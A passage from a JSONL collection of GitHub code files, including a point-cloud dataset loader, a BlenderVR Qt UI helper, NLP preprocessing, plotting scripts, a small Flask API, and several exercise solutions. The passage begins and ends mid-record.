Assitant node\n if node.is_assistant:\n \n # Setting Assitant node to False and making it normal node\n node.is_assistant = False\n \n \n \n \n # Save Presentation\n pres.save(outDir + \"smart_art_change_assitant_out.pptx\", slides.export.SaveFormat.PPTX)\n\n#ExEnd:AssistantNode","repo_name":"aspose-slides/Aspose.Slides-for-Python-via-.NET","sub_path":"examples/src/SmartArts/AssistantNode.py","file_name":"AssistantNode.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1919560714","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport random\nimport sys\nimport glob\nimport h5py\nimport numpy as np\nfrom scipy.spatial.transform import Rotation\nfrom torch.utils.data import Dataset\nfrom sklearn.neighbors import NearestNeighbors\nfrom scipy.spatial.distance import minkowski\nimport open3d as o3d\nimport augmentation as t\n\n\n# Part of the code is referred from: https://github.com/charlesq34/pointnet\n\ndef download():\n BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n DATA_DIR = os.path.join(BASE_DIR, 'data')\n if not os.path.exists(DATA_DIR):\n os.mkdir(DATA_DIR)\n if not os.path.exists(os.path.join(DATA_DIR, 'modelnet40_ply_hdf5_2048')):\n www = 'https://shapenet.cs.stanford.edu/media/modelnet40_ply_hdf5_2048.zip'\n zipfile = os.path.basename(www)\n os.system('wget %s; unzip %s' % (www, zipfile))\n os.system('mv %s %s' % (zipfile[:-4], DATA_DIR))\n os.system('rm %s' % (zipfile))\n\n\ndef load_data(partition):\n # download()\n BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n DATA_DIR = os.path.join(BASE_DIR, 'dataset/')\n all_data = []\n all_label = []\n for h5_name in glob.glob(os.path.join(DATA_DIR, 'modelnet40_ply_hdf5_2048', 'ply_data_%s*.h5' % partition)):\n f = h5py.File(h5_name)\n data = f['data'][:].astype('float32')\n label = f['label'][:].astype('int64')\n f.close()\n all_data.append(data)\n all_label.append(label)\n all_data = np.concatenate(all_data, axis=0)\n all_label = np.concatenate(all_label, axis=0)\n return all_data, all_label\n\n\ndef translate_pointcloud(pointcloud):\n xyz1 = np.random.uniform(low=2. / 3., high=3. / 2., size=[3])\n xyz2 = np.random.uniform(low=-0.2, high=0.2, size=[3])\n\n translated_pointcloud = np.add(np.multiply(pointcloud, xyz1), xyz2).astype('float32')\n return translated_pointcloud\n\n\ndef jitter_pointcloud(pointcloud, sigma=0.01, clip=0.05):\n N, C = pointcloud.shape\n pointcloud += np.clip(sigma * np.random.randn(N, C), -1 * clip, clip)\n return pointcloud\n\n\ndef farthest_subsample_points(pointcloud1, pointcloud2, num_subsampled_points=768):\n pointcloud1 = pointcloud1.T\n pointcloud2 = pointcloud2.T\n num_points = pointcloud1.shape[0]\n nbrs1 = NearestNeighbors(n_neighbors=num_subsampled_points, algorithm='auto',\n metric=lambda x, y: minkowski(x, y), n_jobs=1).fit(pointcloud1)\n random_p1 = np.random.random(size=(1, 3)) + np.array([[500, 500, 500]]) * np.random.choice([1, -1, 1, -1])\n idx1 = nbrs1.kneighbors(random_p1, return_distance=False).reshape((num_subsampled_points,))\n nbrs2 = NearestNeighbors(n_neighbors=num_subsampled_points, algorithm='auto',\n metric=lambda x, y: minkowski(x, y), n_jobs=1).fit(pointcloud2)\n random_p2 = random_p1 #np.random.random(size=(1, 3)) + np.array([[500, 500, 500]]) * np.random.choice([1, -1, 2, -2])\n idx2 = nbrs2.kneighbors(random_p2, return_distance=False).reshape((num_subsampled_points,))\n return pointcloud1[idx1, :].T, pointcloud2[idx2, :].T\n\n\nclass ModelNet40(Dataset):\n def __init__(self, num_points, num_subsampled_points = 768, partition='train', gaussian_noise=False, unseen=False, factor=4):\n self.data, self.label = load_data(partition)\n self.num_points = num_points\n self.partition = partition\n self.gaussian_noise = gaussian_noise\n self.unseen = unseen\n self.label = self.label.squeeze()\n self.factor = factor\n self.num_subsampled_points = num_subsampled_points\n if num_points != num_subsampled_points:\n self.subsampled = True\n else:\n self.subsampled = False\n if self.unseen:\n ######## simulate testing on first 20 categories while training on last 20 categories\n if self.partition == 'test':\n self.data = self.data[self.label>=20]\n self.label = self.label[self.label>=20]\n elif self.partition == 'train':\n self.data = self.data[self.label<20]\n self.label = self.label[self.label<20]\n\n def __getitem__(self, item):\n pointcloud = self.data[item][:self.num_points]\n # if self.gaussian_noise:\n # pointcloud = jitter_pointcloud(pointcloud)\n if self.partition != 'train':\n np.random.seed(item)\n anglex = np.random.uniform() * np.pi / self.factor\n angley = np.random.uniform() * np.pi / self.factor\n anglez = np.random.uniform() * np.pi / self.factor\n\n cosx = np.cos(anglex)\n cosy = np.cos(angley)\n cosz = np.cos(anglez)\n sinx = np.sin(anglex)\n siny = np.sin(angley)\n sinz = np.sin(anglez)\n Rx = np.array([[1, 0, 0],\n [0, cosx, -sinx],\n [0, sinx, cosx]])\n Ry = np.array([[cosy, 0, siny],\n [0, 1, 0],\n [-siny, 0, cosy]])\n Rz = np.array([[cosz, -sinz, 0],\n [sinz, cosz, 0],\n [0, 0, 1]])\n # 生成旋转矩阵\n R_ab = Rx.dot(Ry).dot(Rz)\n R_ba = R_ab.T\n # 生成平移向量\n translation_ab = np.array([np.random.uniform(-0.5, 0.5), np.random.uniform(-0.5, 0.5),\n np.random.uniform(-0.5, 0.5)])\n translation_ba = -R_ba.dot(translation_ab)\n\n pointcloud1 = pointcloud.T\n rotation_ab = Rotation.from_euler('zyx', [anglez, angley, anglex])\n pointcloud2 = rotation_ab.apply(pointcloud1.T).T + np.expand_dims(translation_ab, axis=1)\n\n euler_ab = np.asarray([anglez, angley, anglex])\n euler_ba = -euler_ab[::-1]\n\n pointcloud1 = np.random.permutation(pointcloud1.T).T\n pointcloud2 = np.random.permutation(pointcloud2.T).T\n\n if self.gaussian_noise:\n pointcloud1 = jitter_pointcloud(pointcloud1)\n pointcloud2 = jitter_pointcloud(pointcloud2)\n\n if self.subsampled:\n pointcloud1, pointcloud2 = farthest_subsample_points(pointcloud1, pointcloud2,\n num_subsampled_points=self.num_subsampled_points)\n\n return pointcloud1.astype('float32'), pointcloud2.astype('float32'), R_ab.astype('float32'), \\\n translation_ab.astype('float32'), R_ba.astype('float32'), translation_ba.astype('float32'), \\\n euler_ab.astype('float32'), euler_ba.astype('float32')\n\n def __len__(self):\n return self.data.shape[0]\n\n\nclass SceneflowDataset(Dataset):\n ELASTIC_DISTORT_PARAMS = ((0.2, 0.4), (0.8, 1.6))\n ROTATION_AXIS = 'z'\n\n def __init__(self, args, partition='train'):\n self.npoints = args.num_points\n self.partition = partition\n self.root = args.dataset_path\n if self.partition=='train':\n self.datapath = glob.glob(os.path.join(self.root, 'TRAIN*.npz'))\n else:\n self.datapath = glob.glob(os.path.join(self.root, 'TEST*.npz'))\n self.cache = {}\n self.cache_size = 30000\n self.flow_aug = args.flow_aug\n self.use_color = args.use_color\n self.flow_aug_type = args.flow_aug_type\n self.use_aug = args.use_aug\n\n if self.use_aug:\n input_transform = t.Compose([\n t.ElasticDistortion(self.ELASTIC_DISTORT_PARAMS),\n t.RandomHorizontalFlip(self.ROTATION_AXIS, is_temporal=False),\n ])\n self.aug = t.Compose([input_transform])\n\n ###### deal with one bad datapoint with nan value\n self.datapath = [d for d in self.datapath if 'TRAIN_C_0140_left_0006-0' not in d]\n ######\n print(self.partition, ': ',len(self.datapath))\n\n def __getitem__(self, index):\n if index in self.cache:\n pos1, pos2, color1, color2, flow, mask1 = self.cache[index]\n else:\n fn = self.datapath[index]\n with open(fn, 'rb') as fp:\n data = np.load(fp)\n pos1 = data['points1'].astype('float32')\n pos2 = data['points2'].astype('float32')\n color1 = data['color1'].astype('float32')\n color2 = data['color2'].astype('float32')\n flow = data['flow'].astype('float32')\n mask1 = data['valid_mask1']\n\n if len(self.cache) < self.cache_size:\n self.cache[index] = (pos1, pos2, color1, color2, flow, mask1)\n\n if self.partition == 'train':\n n1 = pos1.shape[0]\n sample_idx1 = np.random.choice(n1, self.npoints, replace=False)\n n2 = pos2.shape[0]\n sample_idx2 = np.random.choice(n2, self.npoints, replace=False)\n\n pos1 = pos1[sample_idx1, :]\n pos2 = pos2[sample_idx2, :]\n color1 = color1[sample_idx1, :]\n color2 = color2[sample_idx2, :]\n flow = flow[sample_idx1, :]\n mask1 = mask1[sample_idx1]\n else:\n pos1 = pos1[:self.npoints, :]\n pos2 = pos2[:self.npoints, :]\n color1 = color1[:self.npoints, :]\n color2 = color2[:self.npoints, :]\n flow = flow[:self.npoints, :]\n mask1 = mask1[:self.npoints]\n\n if not self.use_color:\n color1 = np.zeros_like(color1)\n color2 = np.zeros_like(color2)\n\n if self.use_aug and self.partition == 'train':\n pos1, flow = self.aug(pos1, flow)\n\n pos1_center = np.mean(pos1, 0)\n pos1 -= pos1_center\n pos2 -= pos1_center\n\n return pos1, pos2, color1, color2, flow, mask1\n # if self.partition == 'train' and self.flow_aug:\n # if random.random() <= 0.5:\n # return pos1, pos2, color1, color2, flow, mask1\n # else:\n # # The augmentation\n # # select 2 random points\n # idx_knn = np.random.choice(self.npoints, 5, replace=False)\n # # create open3d kdtree\n # pcd = o3d.geometry.PointCloud()\n # pcd.points = o3d.utility.Vector3dVector(pos1)\n # kdtree = o3d.geometry.KDTreeFlann(pcd)\n #\n # if self.flow_aug_type == 'random':\n # # find the nearest neighbor of the 2 random points\n # # max flow min flow\n # max_flow_x = np.max(flow[:, 0])\n # min_flow_x = np.min(flow[:, 0])\n # max_flow_y = np.max(flow[:, 1])\n # min_flow_y = np.min(flow[:, 1])\n # max_flow_z = np.max(flow[:, 2])\n # min_flow_z = np.min(flow[:, 2])\n # for i in range(5):\n # [_, idx, _] = kdtree.search_radius_vector_3d(pos1[idx_knn[i], :], 0.5)\n # idx = np.array(idx)\n # # create random x, y, z flows between min and max\n # flow_x = np.random.uniform(min_flow_x, max_flow_x, idx.shape[0])\n # flow_y = np.random.uniform(min_flow_y, max_flow_y, idx.shape[0])\n # flow_z = np.random.uniform(min_flow_z, max_flow_z, idx.shape[0])\n # flow_idx_augmented = np.zeros((idx.shape[0], 3))\n # flow_idx_augmented[:, 0] = flow_x\n # flow_idx_augmented[:, 1] = flow_y\n # flow_idx_augmented[:, 2] = flow_z\n # flow[idx[0:], :] = flow_idx_augmented\n # pos2 = pos1 + flow\n # color2 = color1\n # mask1 = np.ones_like(mask1)\n # return pos1, pos2, color1, color2, flow, mask1\n #\n # elif self.flow_aug_type == 'replace':\n # for i in range(5):\n # [_, idx, _] = kdtree.search_radius_vector_3d(pos1[idx_knn[i], :], 0.5)\n # idx = np.array(idx)\n # if idx.shape[0] == 0:\n # continue\n # random_index = random.randint(0, self.__len__() - 1)\n # if random_index in self.cache:\n # pos1_random, pos2_random, color1_random, color2_random, flow_random, mask1_random = self.cache[random_index]\n # else:\n # fn_random = self.datapath[random_index]\n # with open(fn_random, 'rb') as fp_random:\n # data_random = np.load(fp_random)\n # pos1_random = data_random['points1'].astype('float32')\n # pos2_random = data_random['points2'].astype('float32')\n # color1_random = data_random['color1'].astype('float32')\n # color2_random = data_random['color2'].astype('float32')\n # flow_random = data_random['flow'].astype('float32')\n # mask1_random = data_random['valid_mask1']\n #\n # if not self.use_color:\n # color1_random = np.zeros_like(color1_random)\n # color2_random = np.zeros_like(color2_random)\n #\n # pcd_random = o3d.geometry.PointCloud()\n # pcd_random.points = o3d.utility.Vector3dVector(pos1_random)\n # kdtree_random = o3d.geometry.KDTreeFlann(pcd_random)\n # random_point = np.random.choice(pos1_random.shape[0], 1, replace=False)\n # [_, idx_random, _] = kdtree_random.search_knn_vector_3d(pos1_random[random_point[0], :], idx.shape[0])\n # idx_random = np.array(idx_random)\n # pos1[idx[0:], :] = pos1_random[idx_random[0:], :]\n # pos2[idx[0:], :] = pos2_random[idx_random[0:], :]\n # color1[idx[0:], :] = color1_random[idx_random[0:], :]\n # color2[idx[0:], :] = color2_random[idx_random[0:], :]\n # flow[idx[0:], :] = flow_random[idx_random[0:], :]\n # mask1[idx[0:]] = mask1_random[idx_random[0:]]\n # return pos1, pos2, color1, color2, flow, mask1\n # else:\n # return pos1, pos2, color1, color2, flow, mask1\n\n def __len__(self):\n return len(self.datapath)\n\n\nif __name__ == '__main__':\n train = ModelNet40(1024)\n test = ModelNet40(1024, 'test')\n for data in train:\n print(data[0].shape)\n break\n","repo_name":"mertkiray/flownet3d_pytorch","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":14675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"1600793107","text":"try:\n\n import os\n import random\n if BlenderVR_QT == 'PyQt4':\n from PyQt4 import QtGui\n else:\n from PySide import QtGui\n\n random.seed()\n\n def load(ui_file, parent_widget):\n fileName, fileExtension = os.path.splitext(ui_file)\n if fileExtension != '.ui':\n return None\n py_file = fileName + '.py'\n if (not os.path.isfile(py_file)\n or os.path.getmtime(py_file) < os.path.getmtime(ui_file)):\n if BlenderVR_QT == 'PyQt4':\n command = 'pyuic4 -w'\n else:\n command = 'pyside-uic'\n os.system(command + ' -o ' + py_file + ' ' + ui_file)\n\n module_path = os.path.dirname(py_file)\n if not os.path.isdir(module_path):\n return None\n\n module_name = os.path.splitext(os.path.basename(py_file))[0]\n try:\n import imp\n (file, file_name, data) = imp.find_module(module_name,\n [module_path])\n except:\n return None\n\n try:\n module = imp.load_module('ui_' + str(random.randrange(268431360)),\n file, file_name, data)\n except:\n return None\n\n import inspect\n for name in dir(module):\n element = getattr(module, name)\n if inspect.isclass(element):\n result = element()\n result.setupUi(parent_widget)\n return result\n return None\n\n def insertWidgetInsideAnother(parent, child):\n child.setParent(parent)\n grid = QtGui.QGridLayout(parent)\n grid.setContentsMargins(0, 0, 0, 0)\n grid.setSpacing(0)\n grid.setContentsMargins(0, 0, 0, 0)\n grid.addWidget(child, 0, 0, 1, 1)\n return grid\n\nexcept:\n pass\n","repo_name":"BlenderVR/source","sub_path":"modules/blendervr/tools/gui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"} +{"seq_id":"22421250455","text":"#%%\n# p64\ntext = \"You say goodbye and I say hello.\"\ntext = text.replace('.', ' .')\ntext\n# %%\nwords = text.split(' ')\nwords\n# %%\nword_to_id = {}\nid_to_word = {}\nfor word in words:\n if word not in word_to_id:\n new_id = len(word_to_id)\n word_to_id[word] = new_id\n id_to_word[new_id] = word\nprint(word_to_id)\nprint(id_to_word)\n# %%\nid_to_word[1]\nword_to_id[\"hello\"]\n# %%\nimport numpy as np\ncorpus = [word_to_id[w] for w in words]\ncorpus = np.array(corpus)\ncorpus\n# %%\ndef preprocess(text):\n text = text.lower()\n text = text.replace('.', ' .')\n words = text.split(' ')\n\n word_to_id = {}\n id_to_word = {}\n for word in words:\n if word not in word_to_id:\n new_id = len(word_to_id)\n word_to_id[word] = new_id\n id_to_word[new_id] = word\n corpus = np.array([word_to_id[e] for e in words])\n\n return corpus, word_to_id, id_to_word\n\n# %%\nprint(preprocess(\"yorosiku onegai simasu\"))\n# %%\ntext = \"You say goodbye and I say hellow.\"\ncorpus, word_to_id, id_to_word = preprocess(text)\n\n# %%\n# util.pyのpreprocess関数を使う\nimport sys\nsys.path.append('..')\nfrom util import preprocess\ntext = \"You say goodbye and I say hellow.\"\nprint(preprocess(text))\n# %%\n","repo_name":"englishta/algorithm","sub_path":"natural.py","file_name":"natural.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7277575427","text":"from model import Overview\nfrom store import init_data_set, timeit, Database\nimport pandas as pd\n\n\n# Total number of outpatient attendances\n# opd_attendance,OPD attendance, GENERAL\n\n# Number of pregnant women with at least one ANC visit\n# 1st_anc_visits,1st ANC Visits, MNCH\n\n# Number of facility births\n# births,Deliveries in unit, MNCH\n\n# Number of perinatal deaths\n# newborn_deaths,Newborn deaths, MNCH\n\n# Number of maternal deaths\n# maternal_deaths__mnch_all,Maternal deaths (all), MNCH\n\n# Number of children younger than 1 year receiving their third dose of diphtheria-tetanus–pertussis (DPT3)\n# dpt3__u1_all,DPT3 doses (all), EPI\n\n# Number of children younger than 1 year receiving their first dose of measles vaccine (MR1)\n# mr1__u1_all,MR1 doses (all), EPI\n\n# Number of children 0-59 months diagnosed with severe wasting and bilateral pitting oedema (SAM)\n# sam_identified,SAM cases identified, NUT\n\n# Number of children 0–59 months of age who received an age-appropriate dose of vitamin A in each semester (Vit A second doses)\n# vitamin_a,Doses of vitamin A (1st & 2nd), NUT\n\n# Number of confirmed TB cases\n# tb_cases_registered,TB cases registered, TB\n\n# Number of injuries due to GBV\n# injuries_gbv,Injuries related to GBV, FP\n\n\n@timeit\ndef overview_plot(data):\n\n # TODO : add this to Card mutation rather then in plot function\n\n data = data.get(\"date_filter\")\n\n min_date = data.date.min()\n max_date = data.date.max()\n\n # filter indicators\n index = [\"date\"]\n indicators = {\n \"OPD attendance\": \"rgb(39, 190, 182)\",\n \"1st ANC Visits\": \"rgb(244, 174, 26)\",\n \"Deliveries in unit\": \"rgb(244, 174, 26)\",\n \"Newborn deaths\": \"rgb(244, 174, 26)\",\n \"Maternal deaths\": \"rgb(244, 174, 26)\",\n \"DPT3 doses to U1\": \"rgb(81, 139, 201)\",\n \"MR1 doses to U1\": \"rgb(81, 139, 201)\",\n \"SAM cases identified\": \"rgb(238, 47, 68)\",\n \"1st & 2nd doses of vitamin A to U5\": \"rgb(103, 191, 107)\",\n \"TB cases registered in treatment unit\": \"rgb(236, 70, 139)\",\n \"Injuries related to GBV\": \"rgb(145, 91, 166)\",\n }\n\n data = data[index + list(indicators.keys())]\n\n data = data.groupby(by=\"date\").sum().reset_index()\n\n data = pd.melt(data, id_vars=[\"date\"])\n\n data = pd.pivot_table(\n data, values=\"value\", index=\"variable\", columns=\"date\"\n ).reset_index()\n\n data[\"percentage\"] = (data[max_date] - data[min_date]\n ) / data[min_date] * 100\n\n data[\"percentage\"] = data[\"percentage\"].apply(lambda x: round(x, 1))\n\n data.rename(\n columns={max_date: \"absolute\", \"variable\": \"indicator_name\"}, inplace=True\n )\n\n data[\"color\"] = data[\"indicator_name\"].apply(lambda x: indicators.get(x))\n\n data.drop(columns=[min_date], inplace=True)\n\n for col in data.columns:\n data[col] = data[col].astype(str)\n\n data[\"percentage\"] = data[\"percentage\"].apply(\n lambda x: f\"{x}%\" if x[0] == \"-\" else f\"+{x}%\"\n )\n\n sort_dict = dict(\n zip(list(indicators.keys()), range(0, len(list(indicators.keys()))))\n )\n\n data.sort_values(\n by=[\"indicator_name\"],\n inplace=True,\n key=lambda x: x.map(sort_dict),\n )\n\n data.set_index([\"indicator_name\", \"color\", \"percentage\"], inplace=True)\n\n return {\"overview\": data}\n\n\noverview = Overview(\n data=init_data_set,\n data_transform=overview_plot,\n title='Absolute value on month of interest and between month of reference and month of interest for priority indicators'\n)\n","repo_name":"DalbergDataInsights/cehs","sub_path":"coc-dashboard/components/indicators_overview.py","file_name":"indicators_overview.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26712626279","text":"def print_sudoku(sudoku: list):\n print()\n print()\n # for row in sudoku:\n for i in range(1, 10):\n count = 1\n # for col in row:\n for col in sudoku[i - 1]:\n if count % 3 == 0:\n print(\"_ \", end=\"\") if col == 0 else print(f\"{col} \", end=\"\")\n else:\n print(\"_ \", end=\"\") if col == 0 else print(f\"{col} \", end=\"\")\n count += 1\n if i % 3 == 0:\n print()\n print()\n else:\n print()\n\n\ndef copy_and_add(sudoku: list, row_no: int, column_no: int, number: int):\n new_sudoku = []\n for row in sudoku:\n new_row = []\n for square in row:\n new_row.append(square)\n new_sudoku.append(new_row)\n new_sudoku[row_no][column_no] = number\n return new_sudoku\n","repo_name":"alexandroscharangionis/MOOC_Helsinki_Python","sub_path":"part05-11_sudoku_add_to_copy/src/sudoku_add_to_copy.py","file_name":"sudoku_add_to_copy.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37139168435","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nclass Exponential:\n @staticmethod\n def P(ld, x):\n if x >= 0:\n return ld * np.exp(-ld * x)\n else:\n return 0\n\n @staticmethod\n def sample(ld):\n s_50 = np.array([Exponential.P(ld, i) for i in range(51)])\n s_100 = np.array([Exponential.P(ld, i) for i in range(101)])\n s_1000 = np.array([Exponential.P(ld, i) for i in range(1001)])\n return s_50, s_100, s_1000\n\n @staticmethod\n def hist_bar_kdeplot(ld):\n fig, ax = plt.subplots(3, 3)\n fig.set_size_inches(15, 10)\n sample = Exponential.sample(ld)\n\n ax[0, 0].set_title(\"sample size = 50\")\n ax[0, 1].set_title(\"sample size = 100\")\n ax[0, 2].set_title(\"sample size = 1000\")\n ax[0, 0].hist(sample[0], bins=20, edgecolor=\"black\")\n ax[0, 1].hist(sample[1], bins=20, edgecolor=\"black\")\n ax[0, 2].hist(sample[2], bins=20, edgecolor=\"black\")\n ax[1, 0].bar(np.arange(51), sample[0])\n ax[1, 1].bar(np.arange(101), sample[1])\n ax[1, 2].bar(np.arange(1001), sample[2])\n sns.kdeplot(sample[0], ax=ax[2, 0])\n sns.kdeplot(sample[1], ax=ax[2, 1])\n sns.kdeplot(sample[2], ax=ax[2, 2])\n\n plt.show()\n","repo_name":"MoncefDj/AI-DS-Masters","sub_path":"1st semester/Statistics for Data Science/Workshop 03/Exponential.py","file_name":"Exponential.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17731724971","text":"\"\"\"\r\nThis is the script I used to convert the output file with the clonal architecture into a format readable by\r\nEvoFreq. This was an integral part of my Muller Plot pipeline.\r\n\"\"\"\r\n\r\nimport sys\r\nimport csv\r\n\r\n\"\"\"\r\nArgument List Structure\r\n[0]----'Single_file.py'\r\n[1]----File names to condense\r\n[2]----Column# (length of simulation)\r\n[3]----Lower loop bound\r\n[4]----Upper loop bound\r\n[5]----Domain Size\r\n[6]----Skip Parameter (Use 1 to include all time points, use n>1 to only include every nth time point)\r\n[7]----Threshold (In Percent)\r\n\"\"\"\r\n\r\ntiming = int(sys.argv[6])\r\ncolumns = int(sys.argv[2]) / timing\r\nthreshold = float(sys.argv[7]) / 100\r\n\r\nfor i in range(int(sys.argv[3]), int(sys.argv[4]) + 1):\r\n core_name = sys.argv[1] + str(i)\r\n new_file = open(\"DS_\" + sys.argv[5] + \"_\" + str(i) + \".csv\", \"a\")\r\n data = [['parents', 'clones']]\r\n for t in range(0, columns + 1):\r\n data[0].append(t * timing)\r\n with open(core_name + '.txt', 'rt') as f:\r\n csv_reader = csv.reader(f)\r\n population = next(csv_reader)\r\n parents = next(csv_reader)\r\n clones = next(csv_reader)\r\n next(csv_reader)\r\n data.append([0, 0])\r\n initial_pop = next(csv_reader)\r\n for t in range(0, columns + 1):\r\n data[1].append(int(initial_pop[t * timing + 8]))\r\n for l in range(0, len(clones)):\r\n data.append([])\r\n data[l + 2].append(int(parents[l]))\r\n data[l + 2].append(int(clones[l]))\r\n pop = next(csv_reader)\r\n for t in range(0, columns + 1):\r\n data[l + 2].append(int(pop[t * timing + 8]))\r\n f.close()\r\n for r in range(0, len(data)):\r\n line_holder = str(data[r][0])\r\n for c in range(1, len(data[r])):\r\n line_holder += ',' + str(data[r][c])\r\n new_file.write(line_holder)\r\n new_file.write(\"\\n\")\r\n new_file.close()\r\n\r\n\r\n\r\n","repo_name":"jackedwards1/CE_ABM","sub_path":"muller_converter.py","file_name":"muller_converter.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29504327110","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nfile = r'\\GDP_PPP.xlsx'\r\nfolder = r'Z:\\...'\r\nlink = folder + file\r\n\r\nvfolder=r'Z:\\...'\r\n\r\ndata = pd.read_excel(link, skiprows=[0, 1, 2])\r\n\r\n#print(data.columns)\r\n#print(data['Country Name'])\r\n\r\ndata = data.rename(columns={\"Country Name\": \"ctry_name\", \"Country Code\": \"ctry_code\",\r\n \"Indicator Name\": \"indicator\", \"Indicator Code\": \"ind_code\"})\r\n\r\ndata = data.set_index('ctry_name')\r\n\r\n\r\ndata2=data.loc[['China', 'Mexico'], :]\r\n\r\n\r\ndata2=data2.drop(['1960', '1961', '1962', '1963', '1964', '1965', '1966', '1967', '1968', '1969', '1970', '1971', '1972',\r\n '1973', '1974', '1975', '1976', '1977', '1978', '1979', '1980', '1981', '1982', '1983', '1984', '1984',\r\n '1985', '1986', '1987', '1988', '1989', '2019'], axis=1)\r\n#print(years)\r\n\r\ncolumns = ['ctry_code', 'indicator', 'ind_code']\r\ndata2.drop(columns, inplace=True, axis=1)\r\n\r\ndata_transpose = data2.T\r\n\r\ndata_transpose['China'] = data_transpose['China']/1000000000000\r\ndata_transpose['Mexico'] = data_transpose['Mexico']/1000000000000\r\n#data_transpose['World'] = data_transpose['World']/1000000000\r\n\r\n\r\n#print(data_transpose)\r\n\r\nsns.set(style=\"darkgrid\")\r\nfig, ax = plt.subplots(figsize=(15, 7))\r\n\r\n\r\nax.plot(data_transpose.index, data_transpose.China, 'r', linewidth=3, label='China')\r\nax.plot(data_transpose.index, data_transpose.Mexico, 'g', linewidth=3, label=\"Mexico\")\r\nax.set_ylabel('GDP, PPP (Billion USD $)');\r\nax.set_xlabel('Year');\r\nplt.legend(title='Countries')\r\n\r\n#plt.show()\r\nplt.savefig(vfolder + r'\\GDP_PPP.png')\r\n\r\nplt.close()","repo_name":"lthayn/china_mexico","sub_path":"GDP_PPP.py","file_name":"GDP_PPP.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42668463437","text":"#!venv/bin/python\nfrom flask import Flask, jsonify, request, abort, make_response\n\napp = Flask(__name__)\n\nwords = []\n\n@app.route('/')\ndef index():\n return \"Hello, Moxrie\"\n\n@app.route('/words/<word>', methods=['GET'])\ndef get_word(word):\n the_word = filter(lambda w: w['string'] == word, words)\n if len(the_word) == 0:\n abort(404)\n return jsonify( the_word[0] )\n\n\n@app.route('/words/<word>', methods=['POST'])\ndef post_word(word):\n if not request.json or not word:\n abort(400) \n json_obj = request.json\n\n if not word_json_valid(json_obj):\n abort(400)\n\n word_already_exits = False\n for w in words:\n if w['string'] == word:\n word_already_exits = True\n if word_already_exits:\n abort(400) \n\n the_word = {\n 'string': word,\n 'meaning': request.json['meaning'],\n 'use': request.json['use'],\n 'legal': False,\n 'references': request.json['references']\n }\n words.append(the_word)\n return jsonify( the_word ), 201\n\ndef word_json_valid(json_request):\n if not 'meaning' in json_request:\n return False\n if not 'use' in json_request:\n return False\n if not 'references' in json_request:\n return False\n return True\n\n\n\nif __name__ == '__main__':\n app.run(debug = True)\n","repo_name":"muskox/moxrie","sub_path":"moxrie.py","file_name":"moxrie.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72470166200","text":"from ast import List\nimport bisect\n\n# 2251: Number of Flowers in Full Bloom\n# Last Updated: Oct 11, 2023\nclass Solution:\n def fullBloomFlowers(self, flowers: List[List[int]], people: List[int]) -> List[int]:\n bloom, wilt = [], []\n for b, w in flowers:\n bloom.append(b)\n wilt.append(w + 1)\n\n bloom.sort()\n wilt.sort()\n for i in range(len(people)):\n t = people[i]\n people[i] = bisect.bisect_right(bloom, t) - bisect.bisect_right(wilt, t)\n return people","repo_name":"damiyu/leetcode-profile","sub_path":"algorithms/hard/hard2251/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9920696650","text":"\"\"\"palindromic prime finder\nclare walker\n5 may 2014\"\"\"\nimport math\n\nimport sys\nsys.setrecursionlimit (30000)\n\ndef palin(string):\n if len(string)==1: #if at end, just return first letter\n return string\n else:\n return string[-1] + palin(string[:-1]) #reverse word\n\ndef palincheck(number): \n \"\"\"returns True if number is a palindrome, False if not\"\"\"\n if str(number) == palin(str(number)):\n return True\n else: \n return False\n\ndef primecheck(number, divisor):\n \"\"\"returns True if number is a prime number, False if not\"\"\"\n # make excpetions for number 1 and 2\n if number ==1:\n return False\n elif number ==2:\n return True\n #if divisor has reached sqaure root of number and no factor has been found, final prime decision is made\n elif divisor >= math.sqrt(number):\n if number%divisor==0: #if square root is a factor, then not prime\n return False\n else:\n return True # if all up to square root, and square root, are not factors, number is a prime\n elif number % divisor == 0: #factor found, thus not prime\n return False\n else: # carry on\n return primecheck(number, divisor +1)\n\ndef palinprime(N, M):\n \"\"\"iterates through interval [N, M] and makes a string of palindromic primes each separated by a space\"\"\"\n if N==M:\n if palincheck(N) and primecheck(N,2):\n return str(N)\n else:\n return \"\"\n else:\n if palincheck(N) and primecheck(N,2):\n return str(N) + ' '+ palinprime(N + 1, M)\n else:\n return palinprime(N+1, M)\n\ndef printpp(pplist):\n \"\"\"prints a given list with each item on a new line\"\"\"\n if len(pplist) ==1:\n return print(pplist[0])\n else:\n print(pplist[0])\n return printpp(pplist[1:])\n \n \ndef main(): #get and process inputs using functions\n N = eval(input(\"Enter the starting point N:\\n\"))\n M = 